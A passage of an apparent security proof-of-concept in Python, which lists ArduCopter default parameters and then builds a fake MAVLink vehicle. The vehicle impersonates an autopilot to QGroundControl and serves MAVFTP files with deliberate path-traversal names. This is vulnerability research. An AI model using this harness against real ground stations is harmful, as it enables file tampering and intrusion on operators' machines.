PSC_D_VEL_FLTD 5
PSC_D_VEL_FLTE 5
PSC_D_VEL_I 0
PSC_D_VEL_IMAX 10
PSC_D_VEL_P 5
PSC_JERK_D 5
PSC_JERK_NE 5
PSC_NE_POS_P 1
PSC_NE_VEL_D 0.25
PSC_NE_VEL_FF 0
PSC_NE_VEL_FLTD 5
PSC_NE_VEL_FLTE 5
PSC_NE_VEL_I 1
PSC_NE_VEL_IMAX 10
PSC_NE_VEL_P 2
RALLY_INCL_HOME 1
RALLY_LIMIT_KM 0.30000001192092896
RALLY_TOTAL 0
RC10_DZ 0
RC10_MAX 1900
RC10_MIN 1100
RC10_OPTION 0
RC10_REVERSED 0
RC10_TRIM 1500
RC11_DZ 0
RC11_MAX 1900
RC11_MIN 1100
RC11_OPTION 0
RC11_REVERSED 0
RC11_TRIM 1500
RC12_DZ 0
RC12_MAX 1900
RC12_MIN 1100
RC12_OPTION 0
RC12_REVERSED 0
RC12_TRIM 1500
RC13_DZ 0
RC13_MAX 1900
RC13_MIN 1100
RC13_OPTION 0
RC13_REVERSED 0
RC13_TRIM 1500
RC14_DZ 0
RC14_MAX 1900
RC14_MIN 1100
RC14_OPTION 0
RC14_REVERSED 0
RC14_TRIM 1500
RC15_DZ 0
RC15_MAX 1900
RC15_MIN 1100
RC15_OPTION 0
RC15_REVERSED 0
RC15_TRIM 1500
RC16_DZ 0
RC16_MAX 1900
RC16_MIN 1100
RC16_OPTION 0
RC16_REVERSED 0
RC16_TRIM 1500
RC1_DZ 20
RC1_MAX 2000
RC1_MIN 1000
RC1_OPTION 0
RC1_REVERSED 0
RC1_TRIM 1500
RC2_DZ 20
RC2_MAX 2000
RC2_MIN 1000
RC2_OPTION 0
RC2_REVERSED 0
RC2_TRIM 1500
RC3_DZ 30
RC3_MAX 2000
RC3_MIN 1000
RC3_OPTION 0
RC3_REVERSED 0
RC3_TRIM 1500
RC4_DZ 20
RC4_MAX 2000
RC4_MIN 1000
RC4_OPTION 0
RC4_REVERSED 0
RC4_TRIM 1500
RC5_DZ 0
RC5_MAX 2000
RC5_MIN 1000
RC5_OPTION 0
RC5_REVERSED 0
RC5_TRIM 1500
RC6_DZ 0
RC6_MAX 2000
RC6_MIN 1000
RC6_OPTION 0
RC6_REVERSED 0
RC6_TRIM 1500
RC7_DZ 0
RC7_MAX 2000
RC7_MIN 1000
RC7_OPTION 7
RC7_REVERSED 0
RC7_TRIM 1500
RC8_DZ 0
RC8_MAX 2000
RC8_MIN 1000
RC8_OPTION 0
RC8_REVERSED 0
RC8_TRIM 1500
RC9_DZ 0
RC9_MAX 1900
RC9_MIN 1100
RC9_OPTION 0
RC9_REVERSED 0
RC9_TRIM 1500
RCMAP_PITCH 2
RCMAP_ROLL 1
RCMAP_THROTTLE 3
RCMAP_YAW 4
RC_FS_TIMEOUT 1
RC_OPTIONS 32
RC_OVERRIDE_TIME 3
RC_PROTOCOLS 1
RC_SPEED 490
RELAY1_DEFAULT 0
RELAY1_FUNCTION 1
RELAY1_INVERTED 0
RELAY1_PIN 13
RELAY2_FUNCTION 0
RELAY3_FUNCTION 0
RELAY4_FUNCTION 0
RELAY5_FUNCTION 0
RELAY6_FUNCTION 0
RNGFND1_TYPE 0
RNGFND2_TYPE 0
RNGFND3_TYPE 0
RNGFND4_TYPE 0
RNGFND5_TYPE 0
RNGFND6_TYPE 0
RNGFND7_TYPE 0
RNGFND8_TYPE 0
RNGFND9_TYPE 0
RNGFNDA_TYPE 0
RNGFND_FILT 0.5
RPM1_TYPE 0
RPM2_TYPE 0
RSSI_TYPE 0
RTL_ALT_FINAL_M 0
RTL_ALT_M 15
RTL_ALT_TYPE 0
RTL_CLIMB_MIN_M 0
RTL_CONE_SLOPE 3
RTL_LOIT_TIME 5000
RTL_OPTIONS 0
RTL_SPEED_MS 0
SCHED_DEBUG 0
SCHED_LOOP_RATE 400
SCHED_OPTIONS 0
SCR_ENABLE 0
SERIAL0_BAUD 115
SERIAL0_PROTOCOL 2
SERIAL1_BAUD 57
SERIAL1_OPTIONS 0
SERIAL1_PROTOCOL 2
SERIAL2_BAUD 57
SERIAL2_OPTIONS 0
SERIAL2_PROTOCOL 2
SERIAL3_BAUD 230
SERIAL3_OPTIONS 0
SERIAL3_PROTOCOL 5
SERIAL4_BAUD 230
SERIAL4_OPTIONS 0
SERIAL4_PROTOCOL 5
SERIAL5_BAUD 57
SERIAL5_OPTIONS 0
SERIAL5_PROTOCOL -1
SERIAL6_BAUD 57
SERIAL6_OPTIONS 0
SERIAL6_PROTOCOL -1
SERIAL7_BAUD 57
SERIAL7_OPTIONS 0
SERIAL7_PROTOCOL -1
SERIAL_PASS1 0
SERIAL_PASS2 -1
SERIAL_PASSTIMO 15
SERVO10_FUNCTION 0
SERVO10_MAX 1900
SERVO10_MIN 1100
SERVO10_REVERSED 0
SERVO10_TRIM 1500
SERVO11_FUNCTION 0
SERVO11_MAX 1900
SERVO11_MIN 1100
SERVO11_REVERSED 0
SERVO11_TRIM 1500
SERVO12_FUNCTION 0
SERVO12_MAX 1900
SERVO12_MIN 1100
SERVO12_REVERSED 0
SERVO12_TRIM 1500
SERVO13_FUNCTION 0
SERVO13_MAX 1900
SERVO13_MIN 1100
SERVO13_REVERSED 0
SERVO13_TRIM 1500
SERVO14_FUNCTION 0
SERVO14_MAX 1900
SERVO14_MIN 1100
SERVO14_REVERSED 0
SERVO14_TRIM 1500
SERVO15_FUNCTION 0
SERVO15_MAX 1900
SERVO15_MIN 1100
SERVO15_REVERSED 0
SERVO15_TRIM 1500
SERVO16_FUNCTION 0
SERVO16_MAX 1900
SERVO16_MIN 1100
SERVO16_REVERSED 0
SERVO16_TRIM 1500
SERVO1_FUNCTION 33
SERVO1_MAX 1900
SERVO1_MIN 1100
SERVO1_REVERSED 0
SERVO1_TRIM 1500
SERVO2_FUNCTION 34
SERVO2_MAX 1900
SERVO2_MIN 1100
SERVO2_REVERSED 0
SERVO2_TRIM 1500
SERVO3_FUNCTION 35
SERVO3_MAX 1900
SERVO3_MIN 1100
SERVO3_REVERSED 0
SERVO3_TRIM 1500
SERVO4_FUNCTION 36
SERVO4_MAX 1900
SERVO4_MIN 1100
SERVO4_REVERSED 0
SERVO4_TRIM 1500
SERVO5_FUNCTION 0
SERVO5_MAX 1900
SERVO5_MIN 1100
SERVO5_REVERSED 0
SERVO5_TRIM 1500
SERVO6_FUNCTION 0
SERVO6_MAX 1900
SERVO6_MIN 1100
SERVO6_REVERSED 0
SERVO6_TRIM 1500
SERVO7_FUNCTION 0
SERVO7_MAX 1900
SERVO7_MIN 1100
SERVO7_REVERSED 0
SERVO7_TRIM 1500
SERVO8_FUNCTION 0
SERVO8_MAX 1900
SERVO8_MIN 1100
SERVO8_REVERSED 0
SERVO8_TRIM 1500
SERVO9_FUNCTION 0
SERVO9_MAX 1900
SERVO9_MIN 1100
SERVO9_REVERSED 0
SERVO9_TRIM 1500
SERVO_32_ENABLE 0
SERVO_DSHOT_ESC 0
SERVO_DSHOT_RATE 0
SERVO_FTW_MASK 0
SERVO_FTW_POLES 14
SERVO_FTW_RVMASK 0
SERVO_GPIO_MASK 0
SERVO_RATE 50
SERVO_RC_FS_MSK 0
SERVO_ROB_POSMAX 4095
SERVO_ROB_POSMIN 0
SERVO_SBUS_RATE 50
SERVO_VOLZ_MASK 0
SERVO_VOLZ_RANGE 200
SID_AXIS 0
SIMPLE 0
SIM_ACC1_BIAS_X 0
SIM_ACC1_BIAS_Y 0
SIM_ACC1_BIAS_Z 0
SIM_ACC1_RND 0
SIM_ACC1_SCAL_X 0
SIM_ACC1_SCAL_Y 0
SIM_ACC1_SCAL_Z 0
SIM_ACC2_BIAS_X 0
SIM_ACC2_BIAS_Y 0
SIM_ACC2_BIAS_Z 0
SIM_ACC2_RND 0
SIM_ACC2_SCAL_X 0
SIM_ACC2_SCAL_Y 0
SIM_ACC2_SCAL_Z 0
SIM_ACC3_BIAS_X 0
SIM_ACC3_BIAS_Y 0
SIM_ACC3_BIAS_Z 0
SIM_ACC3_RND 0
SIM_ACC3_SCAL_X 0
SIM_ACC3_SCAL_Y 0
SIM_ACC3_SCAL_Z 0
SIM_ACCEL1_FAIL 0
SIM_ACCEL2_FAIL 0
SIM_ACCEL3_FAIL 0
SIM_ACC_FAIL_MSK 0
SIM_ACC_FILE_RW 0
SIM_ACC_TRIM_X 0
SIM_ACC_TRIM_Y 0
SIM_ACC_TRIM_Z 0
SIM_ADSB_ALT 1000
SIM_ADSB_COUNT -1
SIM_ADSB_RADIUS 10000
SIM_ADSB_TX 0
SIM_ADSB_TYPES 1
SIM_ARSPD2_FAIL 0
SIM_ARSPD2_FAILP 0
SIM_ARSPD2_OFS 2013
SIM_ARSPD2_PITOT 0
SIM_ARSPD2_RATIO 1.9900000095367432
SIM_ARSPD2_RND 2
SIM_ARSPD2_SIGN 0
SIM_ARSPD_FAIL 0
SIM_ARSPD_FAILP 0
SIM_ARSPD_OFS 2013
SIM_ARSPD_PITOT 0
SIM_ARSPD_RATIO 1.9900000095367432
SIM_ARSPD_RND 2
SIM_ARSPD_SIGN 0
SIM_BAR2_DELAY 0
SIM_BAR2_DISABLE 0
SIM_BAR2_DRIFT 0
SIM_BAR2_FREEZE 0
SIM_BAR2_GLITCH 0
SIM_BAR2_RND 0.20000000298023224
SIM_BAR2_WCF_BAK 0
SIM_BAR2_WCF_DN 0
SIM_BAR2_WCF_FWD 0
SIM_BAR2_WCF_LFT 0
SIM_BAR2_WCF_RGT 0
SIM_BAR2_WCF_UP 0
SIM_BAR3_DELAY 0
SIM_BAR3_DISABLE 0
SIM_BAR3_DRIFT 0
SIM_BAR3_FREEZE 0
SIM_BAR3_GLITCH 0
SIM_BAR3_RND 0.20000000298023224
SIM_BAR3_WCF_BAK 0
SIM_BAR3_WCF_DN 0
SIM_BAR3_WCF_FWD 0
SIM_BAR3_WCF_LFT 0
SIM_BAR3_WCF_RGT 0
SIM_BAR3_WCF_UP 0
SIM_BARO_COUNT 2
SIM_BARO_DELAY 0
SIM_BARO_DISABLE 0
SIM_BARO_DRIFT 0
SIM_BARO_FREEZE 0
SIM_BARO_GLITCH 0
SIM_BARO_RND 0
SIM_BARO_WCF_BAK 0
SIM_BARO_WCF_DN 0
SIM_BARO_WCF_FWD 0
SIM_BARO_WCF_LFT 0
SIM_BARO_WCF_RGT 0
SIM_BARO_WCF_UP 0
SIM_BATT_CAP_AH 0
SIM_BATT_VOLTAGE 12.600000381469727
SIM_BAUDLIMIT_EN 0
SIM_CAN_SRV_MSK 0
SIM_CAN_TYPE1 1
SIM_CAN_TYPE2 1
SIM_CLAMP_CH 0
SIM_DRIFT_SPEED 0.05000000074505806
SIM_DRIFT_TIME 5
SIM_EFI_TYPE 0
SIM_ENGINE_FAIL 0
SIM_ENGINE_MUL 0
SIM_ESC_ARM_RPM 0
SIM_ESC_TELEM 1
SIM_FLOAT_EXCEPT 1
SIM_FLOW_DELAY 0
SIM_FLOW_ENABLE 0
SIM_FLOW_POS_X 0
SIM_FLOW_POS_Y 0
SIM_FLOW_POS_Z 0
SIM_FLOW_RATE 10
SIM_FLOW_RND 0.05000000074505806
SIM_FTOWESC_ENA 0
SIM_FTOWESC_POW 4095
SIM_GND_BEHAV -1
SIM_GPS1_ACC 0.30000001192092896
SIM_GPS1_ALT_OFS 0
SIM_GPS1_BYTELOS 0
SIM_GPS1_DRFTALT 0
SIM_GPS1_ENABLE 1
SIM_GPS1_GLTCH_X 0
SIM_GPS1_GLTCH_Y 0
SIM_GPS1_GLTCH_Z 0
SIM_GPS1_HDG 0
SIM_GPS1_HDG_OFS 0
SIM_GPS1_HZ 5
SIM_GPS1_JAM 0
SIM_GPS1_LAG_MS 100
SIM_GPS1_LCKTIME 0
SIM_GPS1_NOISE 0
SIM_GPS1_NUMSATS 10
SIM_GPS1_OPTIONS 0
SIM_GPS1_POS_X 0
SIM_GPS1_POS_Y 0
SIM_GPS1_POS_Z 0
SIM_GPS1_TYPE 1
SIM_GPS1_VERR_X 0
SIM_GPS1_VERR_Y 0
SIM_GPS1_VERR_Z 0
SIM_GPS2_ENABLE 0
SIM_GPS3_ENABLE 0
SIM_GPS4_ENABLE 0
SIM_GPS_LOG_NUM 0
SIM_GRPE_ENABLE 0
SIM_GRPE_PIN -1
SIM_GRPS_ENABLE 0
SIM_GRPS_GRAB 2000
SIM_GRPS_PIN -1
SIM_GRPS_RELEASE 1000
SIM_GRPS_REVERSE 0
SIM_GYR1_BIAS_X 0
SIM_GYR1_BIAS_Y 0
SIM_GYR1_BIAS_Z 0
SIM_GYR1_RND 0
SIM_GYR1_SCALE_X 0
SIM_GYR1_SCALE_Y 0
SIM_GYR1_SCALE_Z 0
SIM_GYR2_BIAS_X 0
SIM_GYR2_BIAS_Y 0
SIM_GYR2_BIAS_Z 0
SIM_GYR2_RND 0
SIM_GYR2_SCALE_X 0
SIM_GYR2_SCALE_Y 0
SIM_GYR2_SCALE_Z 0
SIM_GYR3_BIAS_X 0
SIM_GYR3_BIAS_Y 0
SIM_GYR3_BIAS_Z 0
SIM_GYR3_RND 0
SIM_GYR3_SCALE_X 0
SIM_GYR3_SCALE_Y 0
SIM_GYR3_SCALE_Z 0
SIM_GYR_FAIL_MSK 0
SIM_GYR_FILE_RW 0
SIM_IE24_ENABLE 0
SIM_IE24_ERROR 0
SIM_IE24_STATE -1
SIM_IMUT1_ENABLE 0
SIM_IMUT2_ENABLE 0
SIM_IMUT3_ENABLE 0
SIM_IMUT_END 45
SIM_IMUT_FIXED 0
SIM_IMUT_START 25
SIM_IMUT_TCONST 300
SIM_IMU_COUNT 2
SIM_IMU_ORIENT 0
SIM_IMU_POS_X 0
SIM_IMU_POS_Y 0
SIM_IMU_POS_Z 0
SIM_INIT_ALT_OFS 0
SIM_INIT_LAT_OFS 0
SIM_INIT_LON_OFS 0
SIM_INS_THR_MIN 0.10000000149011612
SIM_JSON_MASTER 0
SIM_LED_LAYOUT 0
SIM_LOOP_DELAY 0
SIM_MAG1_DEVID 97539
SIM_MAG1_DIA_X 0
SIM_MAG1_DIA_Y 0
SIM_MAG1_DIA_Z 0
SIM_MAG1_FAIL 0
SIM_MAG1_ODI_X 0
SIM_MAG1_ODI_Y 0
SIM_MAG1_ODI_Z 0
SIM_MAG1_OFS_X 5
SIM_MAG1_OFS_Y 13
SIM_MAG1_OFS_Z -18
SIM_MAG1_ORIENT 0
SIM_MAG1_SCALING 1
SIM_MAG2_DEVID 131874
SIM_MAG2_DIA_X 0
SIM_MAG2_DIA_Y 0
SIM_MAG2_DIA_Z 0
SIM_MAG2_FAIL 0
SIM_MAG2_ODI_X 0
SIM_MAG2_ODI_Y 0
SIM_MAG2_ODI_Z 0
SIM_MAG2_OFS_X 5
SIM_MAG2_OFS_Y 13
SIM_MAG2_OFS_Z -18
SIM_MAG2_ORIENT 0
SIM_MAG2_SCALING 1
SIM_MAG3_DEVID 263178
SIM_MAG3_DIA_X 0
SIM_MAG3_DIA_Y 0
SIM_MAG3_DIA_Z 0
SIM_MAG3_FAIL 0
SIM_MAG3_ODI_X 0
SIM_MAG3_ODI_Y 0
SIM_MAG3_ODI_Z 0
SIM_MAG3_OFS_X 5
SIM_MAG3_OFS_Y 13
SIM_MAG3_OFS_Z -18
SIM_MAG3_ORIENT 0
SIM_MAG3_SCALING 1
SIM_MAG4_DEVID 97283
SIM_MAG5_DEVID 97795
SIM_MAG6_DEVID 98051
SIM_MAG7_DEVID 0
SIM_MAG8_DEVID 0
SIM_MAG_ALY_HGT 1
SIM_MAG_ALY_X 0
SIM_MAG_ALY_Y 0
SIM_MAG_ALY_Z 0
SIM_MAG_DELAY 0
SIM_MAG_MOT_X 0
SIM_MAG_MOT_Y 0
SIM_MAG_MOT_Z 0
SIM_MAG_RND 0
SIM_MAG_SAVE_IDS 1
SIM_ODOM_ENABLE 0
SIM_OH_MASK 0
SIM_OH_RELAY_MSK -1
SIM_OPOS_ALT 584
SIM_OPOS_HDG 353
SIM_OPOS_LAT -35.36326217651367
SIM_OPOS_LNG 149.1652374267578
SIM_PARA_ENABLE 0
SIM_PARA_PIN -1
SIM_PIN_MASK 0
SIM_PLD_ALT_LMT 15
SIM_PLD_DIST_LMT 10
SIM_PLD_ENABLE 0
SIM_PLD_HEIGHT 0
SIM_PLD_LAT -35.36326217651367
SIM_PLD_LON 149.1652374267578
SIM_PLD_OPTIONS 0
SIM_PLD_ORIENT 24
SIM_PLD_RATE 100
SIM_PLD_SHIP 0
SIM_PLD_TYPE 0
SIM_PLD_YAW 353
SIM_RATE_HZ 1200
SIM_RC_CHANCOUNT 16
SIM_RC_FAIL 0
SIM_RICH_CTRL -1
SIM_RICH_ENABLE 0
SIM_SERVO_DELAY 0
SIM_SERVO_FILTER 0
SIM_SERVO_SPEED 0.14000000059604645
SIM_SHIP_DSIZE 10
SIM_SHIP_ENABLE 0
SIM_SHIP_OFS_X 0
SIM_SHIP_OFS_Y 0
SIM_SHIP_OFS_Z 0
SIM_SHIP_PSIZE 1000
SIM_SHIP_SPEED 3
SIM_SHIP_SYSID 17
SIM_SHOVE_TIME 0
SIM_SHOVE_X 0
SIM_SHOVE_Y 0
SIM_SHOVE_Z 0
SIM_SLUP_ENABLE 0
SIM_SONAR_GLITCH 0
SIM_SONAR_POS_X 0
SIM_SONAR_POS_Y 0
SIM_SONAR_POS_Z 0
SIM_SONAR_RND 0
SIM_SONAR_ROT 25
SIM_SONAR_SCALE 12.121199607849121
SIM_SPEEDUP 10
SIM_SPR_ENABLE 0
SIM_SPR_PUMP -1
SIM_SPR_SPIN -1
SIM_TA_ENABLE 1
SIM_TEMP_BFACTOR 0
SIM_TEMP_BRD_OFF 20
SIM_TEMP_START 25
SIM_TEMP_TCONST 30
SIM_TERRAIN 1
SIM_TETH_ENABLE 0
SIM_THML_SCENARI 0
SIM_TIDE_DIR 0
SIM_TIDE_SPEED 0
SIM_TIME_JITTER 0
SIM_TWIST_TIME 0
SIM_TWIST_X 0
SIM_TWIST_Y 0
SIM_TWIST_Z 0
SIM_UART_LOSS 0
SIM_VIB_FREQ_X 0
SIM_VIB_FREQ_Y 0
SIM_VIB_FREQ_Z 0
SIM_VIB_MOT_HMNC 1
SIM_VIB_MOT_MASK 0
SIM_VIB_MOT_MAX 0
SIM_VIB_MOT_MULT 1
SIM_VICON_FAIL 0
SIM_VICON_GLIT_X 0
SIM_VICON_GLIT_Y 0
SIM_VICON_GLIT_Z 0
SIM_VICON_POS_X 0
SIM_VICON_POS_Y 0
SIM_VICON_POS_Z 0
SIM_VICON_P_SD 0
SIM_VICON_QUAL 50
SIM_VICON_RATE 50
SIM_VICON_TMASK 3
SIM_VICON_VGLI_X 0
SIM_VICON_VGLI_Y 0
SIM_VICON_VGLI_Z 0
SIM_VICON_V_SD 0
SIM_VICON_YAW 0
SIM_VICON_YAWERR 0
SIM_VOLZ_ENA 0
SIM_VOLZ_FMASK 0
SIM_VOLZ_MASK 11
SIM_WAVE_AMP 0.5
SIM_WAVE_DIR 0
SIM_WAVE_ENABLE 0
SIM_WAVE_LENGTH 10
SIM_WAVE_SPEED 0.5
SIM_WIND_DIR 180
SIM_WIND_DIR_Z 0
SIM_WIND_SPD 0
SIM_WIND_T 0
SIM_WIND_TC 5
SIM_WIND_TURB 0
SIM_WIND_T_ALT 60
SIM_WIND_T_COEF 0.009999999776482582
SIM_WOW_PIN -1
SPRAY_ENABLE 0
SRTL_ACCURACY 2
SRTL_OPTIONS 0
SRTL_POINTS 300
STAT_BOOTCNT 1
STAT_DISTFLWN 0
STAT_FLTCNT 0
STAT_FLTTIME 0
STAT_RESET 1
STAT_RUNTIME 0
SUPER_SIMPLE 0
SURFTRAK_MODE 1
SURFTRAK_TC 1
TCAL_ENABLED 0
TEMP1_TYPE 0
TEMP2_TYPE 0
TEMP3_TYPE 0
TEMP_LOG 0
TERRAIN_CACHE_SZ 12
TERRAIN_ENABLE 1
TERRAIN_MARGIN 0.05000000074505806
TERRAIN_OFS_MAX 30
TERRAIN_OPTIONS 0
TERRAIN_SPACING 100
THROW_ALT_ACSND 3
THROW_ALT_DCSND 1
THROW_ALT_MAX 0
THROW_ALT_MIN 0
THROW_MOT_START 0
THROW_NEXTMODE 18
THROW_TYPE 0
THR_DZ 100
TKOFF_RPM_MAX 0
TKOFF_RPM_MIN 0
TKOFF_SLEW_TIME 2
TKOFF_THR_MAX 0.8999999761581421
TUNE 0
TUNE2 0
TUNE2_MAX 0
TUNE2_MIN 0
TUNE_MAX 0
TUNE_MIN 0
VISO_TYPE 0
VTX_ENABLE 0
WINCH_TYPE 0
WP_ACC 2.5
WP_ACC_CNR 0
WP_ACC_Z 1
WP_JERK 1
WP_NAVALT_MIN 0
WP_RADIUS_M 2
WP_RFND_USE 1
WP_SPD 10
WP_SPD_DN 1.5
WP_SPD_UP 2.5
WP_TER_MARGIN 10
WP_YAW_BEHAVIOR 2
WVANE_ENABLE 0
ZIGZ_AUTO_ENABLE 0
"""

def _parse_default_params(tsv):
    params = {}
    for line in tsv.strip().splitlines():
        name, val = line.split()
        params[name] = float(val)
    return params


class FakeVehicle:
    HEARTBEAT_HZ = 1.0

    # Full real ArduCopter 4.7.0 default param set (see _COPTER_DEFAULT_PARAMS_TSV
    # above) with a small override layer for values this PoC actually depends on:
    #
    #  * SCR_ENABLE: stock default is 0. ScriptingComponent.qml:23 does
    #    factController.getParameterFact(-1, "SCR_ENABLE", false); if that fact is
    #    null or falsy, the Lua Scripting page shows "Scripting is not supported
    #    by this version of firmware" and disables listDirectory/download --
    #    the FTP traversal sink is never reached. Must be truthy.
    #  * ARMING_CHECK / SYSID_THISMAV: read by the Safety summary tile and various
    #    setup pages but absent from the 4.7.0 default dump itself; add them so
    #    those specific lookups don't report missing.
    PARAMS = _parse_default_params(_COPTER_DEFAULT_PARAMS_TSV)
    PARAMS.update({
        "SCR_ENABLE": 1.0,
        "ARMING_CHECK": 1.0,
        "SYSID_THISMAV": 1.0,
    })

    # Looks like ArduCopter 4.5.7 (official) on a Cube Orange -- matches the
    # MP-01/02/03 PoCs so QGC's vehicle-setup / capability probes get a
    # consistent, realistic autopilot identity.
    FW_VERSION = (4 << 24) | (5 << 16) | (7 << 8) | 255      # major.minor.patch.type
    GIT_HASH = list(b"1f3a9c20")                              # 8 bytes
    BOARD_VERSION = 0x010F0000
    VENDOR_ID, PRODUCT_ID, UID = 0x2DAE, 0x1011, 0x3138353012345678

    CAPABILITIES = (
        mavutil.mavlink.MAV_PROTOCOL_CAPABILITY_FTP
        | mavutil.mavlink.MAV_PROTOCOL_CAPABILITY_MISSION_FLOAT
        | mavutil.mavlink.MAV_PROTOCOL_CAPABILITY_PARAM_FLOAT
        | mavutil.mavlink.MAV_PROTOCOL_CAPABILITY_MISSION_INT
        | mavutil.mavlink.MAV_PROTOCOL_CAPABILITY_COMMAND_INT
        | mavutil.mavlink.MAV_PROTOCOL_CAPABILITY_SET_POSITION_TARGET_LOCAL_NED
        | mavutil.mavlink.MAV_PROTOCOL_CAPABILITY_SET_POSITION_TARGET_GLOBAL_INT
        | mavutil.mavlink.MAV_PROTOCOL_CAPABILITY_TERRAIN
        | mavutil.mavlink.MAV_PROTOCOL_CAPABILITY_FLIGHT_TERMINATION
        | mavutil.mavlink.MAV_PROTOCOL_CAPABILITY_COMPASS_CALIBRATION
        | mavutil.mavlink.MAV_PROTOCOL_CAPABILITY_MAVLINK2
        | mavutil.mavlink.MAV_PROTOCOL_CAPABILITY_MISSION_FENCE
        | mavutil.mavlink.MAV_PROTOCOL_CAPABILITY_MISSION_RALLY
    )

    BOOT_BANNER = [
        "ArduCopter V4.5.7 (1f3a9c20)",
        "ChibiOS: db580d2e",
        "CubeOrange 0042002A",
        "Frame: QUAD/X",
        "IMU0: fast sampling 8.0kHz",
        "RCOut: PWM:1-14",
    ]

    def __init__(self, conn_str, sysid=1, compid=1, verbose=True, dialect="ardupilotmega"):
        self.conn_str = conn_str
        self.sysid = sysid
        self.compid = compid
        self.verbose = verbose
        self.dialect = dialect
        self.master = None
        self._hb_thread = None
        self._rx_thread = None
        self._running = False
        self._seq_lock = threading.Lock()
        self.greeted = False
        # Instance copy: PARAM_REQUEST_READ auto-registers unknown names into
        # this dict (see _rx_loop), so it must not mutate the class attribute.
        self.PARAMS = dict(self.PARAMS)
        # MAVFTP server state: a dict of {filename: bytes} the attacker serves.
        # filenames may contain traversal / absolute-path sequences on purpose.
        self.ftp_files = {}
        self._send_lock = threading.Lock()   # serialise srcComponent restamping
        self.ftp_dir_entries = []    # list of (name, size, is_dir)
        self.ftp_dir_mtimes = {}     # name -> unix mtime (secs, UTC)
        self._ftp_sessions = {}       # session_id -> (filename, bytes)

    # -- construction --------------------------------------------------------
    @classmethod
    def from_cli(cls, title=None, extra_args=None):
        """Parse the common CLI and return a configured (unstarted) FakeVehicle.
        `extra_args(parser)` lets a PoC add its own flags before parsing."""
        p = argparse.ArgumentParser(add_help=True, description=title or "fake malicious vehicle")
        g = p.add_mutually_exclusive_group()
        g.add_argument("--listen", metavar="HOST:PORT", default="127.0.0.1:5760",
                       help="bind a TCP server the GCS connects TO (SITL-style). default 127.0.0.1:5760")
        g.add_argument("--udpout", metavar="HOST:PORT",
                       help="push UDP to a listening GCS, e.g. 127.0.0.1:14550")
        g.add_argument("--connect", metavar="STR",
                       help="raw pymavlink connection string, used verbatim")
        p.add_argument("--sysid", type=int, default=1, help="our advertised system id (default 1)")
        p.add_argument("--compid", type=int, default=1, help="our advertised component id (default 1 = autopilot)")
        p.add_argument("--quiet", action="store_true", help="less logging")
        if extra_args:
            extra_args(p)
        a, _ = p.parse_known_args()

        if a.connect:
            conn = a.connect
        elif a.udpout:
            conn = "udpout:" + a.udpout
        else:
            # tcpin: == we are the TCP *server* and bind; the GCS dials in.
            conn = "tcpin:" + a.listen
        self = cls(conn, sysid=a.sysid, compid=a.compid, verbose=not a.quiet)
        self._args = a
        return self

    # -- lifecycle -----------------------------------------------------------
    def start(self):
        if self.verbose:
            observe("opening attacker link: %s (advertising sysid=%d compid=%d)"
                    % (self.conn_str, self.sysid, self.compid))
            if self.conn_str.startswith("tcpin:"):
                observe("waiting for the GCS to CONNECT to us (point it at tcp:%s) ..."
                        % self.conn_str[len("tcpin:"):])
        self.master = mavutil.mavlink_connection(
            self.conn_str, source_system=self.sysid, source_component=self.compid,
            dialect=self.dialect, autoreconnect=True)
        self._running = True
        self._hb_thread = threading.Thread(target=self._heartbeat_loop, daemon=True)
        self._hb_thread.start()
        self._rx_thread = threading.Thread(target=self._rx_loop, daemon=True)
        self._rx_thread.start()
        if self.verbose:
            ok("link up; HEARTBEAT @ %.0f Hz running" % self.HEARTBEAT_HZ)
        return self

    def wait_for_gcs(self, timeout=120):
        """Block until a GCS has actually connected.

        For the tcpin (TCP-server) role this matters: pymavlink's mavtcpin.write()
        is a NO-OP until the listening socket has accept()ed a client (the accept
        happens inside recv(), which our _rx_loop drives). One-shot payload sends
        from a PoC would otherwise race the accept and be silently dropped. UDP/
        udpout roles have no accept step, so we return immediately for them.
        Returns True once connected (or for connectionless roles), False on timeout.
        """
        # mavudp / udpout have no 'port' accept handshake.
        if not self.conn_str.startswith("tcpin:"):
            time.sleep(0.3)
            return True
        deadline = time.time() + timeout
        if self.verbose:
            observe("waiting for a GCS to connect to %s ..." % self.conn_str)
        while time.time() < deadline:
            if getattr(self.master, "port", None) is not None:
                # give the link a beat to settle after accept()
                time.sleep(0.3)
                if self.verbose:
                    ok("GCS connected — sending payload")
                return True
            time.sleep(0.1)
        warn("no GCS connected within %ds" % timeout)
        return False

    def serve_forever(self):
        """Block forever (until Ctrl-C), keeping the heartbeat and FTP server alive."""
        try:
            while self._running:
                time.sleep(0.5)
        except KeyboardInterrupt:
            warn("Ctrl-C — shutting down fake vehicle")
            self.stop()

    def stop(self):
        self._running = False

    # -- heartbeat -----------------------------------------------------------
    def _heartbeat_loop(self):
        period = 1.0 / self.HEARTBEAT_HZ
        while self._running:
            try:
                # type=QUADROTOR, autopilot=ARDUPILOTMEGA so the GCS treats us as
                # a real ArduCopter vehicle and runs its full vehicle-setup logic
                # (camera/FTP/component-metadata probes etc.).
                self.master.mav.heartbeat_send(
                    mavutil.mavlink.MAV_TYPE_QUADROTOR,
                    mavutil.mavlink.MAV_AUTOPILOT_ARDUPILOTMEGA,
                    base_mode=mavutil.mavlink.MAV_MODE_FLAG_CUSTOM_MODE_ENABLED,
                    custom_mode=0,
                    system_status=mavutil.mavlink.MAV_STATE_STANDBY)
            except Exception as e:  # noqa: BLE001 — link may still be establishing
                if self.verbose:
                    warn("heartbeat send failed (link not up yet?): %s" % e)
            time.sleep(period)

    # -- receive / log what the GCS asks for --------------------------------
    def _rx_loop(self):
        while self._running:
            try:
                msg = self.master.recv_match(blocking=True, timeout=0.5)
            except Exception:
                msg = None
                time.sleep(0.2)
            if msg is None:
                continue
            t = msg.get_type()
            if t == "BAD_DATA":
                continue
            # QGC only builds out the full vehicle-setup flow (params,
            # capabilities, the APM Lua Scripting page) once it has seen a
            # HEARTBEAT from us; greet it the first time with a realistic
            # ArduCopter boot banner + AUTOPILOT_VERSION so it doesn't stall.
            if t == "HEARTBEAT" and not self.greeted:
                self.greeted = True
                self.send_boot_banner()
                self.send_autopilot_version()
            # Surface the interesting GCS->vehicle requests so the operator can
            # SEE the GCS taking the bait (camera probe, FTP list/open, etc.).
            if t == "FILE_TRANSFER_PROTOCOL":
                self._handle_ftp(msg)
            elif t == "PARAM_REQUEST_LIST":
                if self.verbose:
                    observe("GCS requested PARAM_REQUEST_LIST")
                for i, (name, val) in enumerate(self.PARAMS.items()):
                    self.send_param_value(name, val, count=len(self.PARAMS), index=i)
            elif t == "PARAM_REQUEST_READ":
                param_name = getattr(msg, "param_id", "")
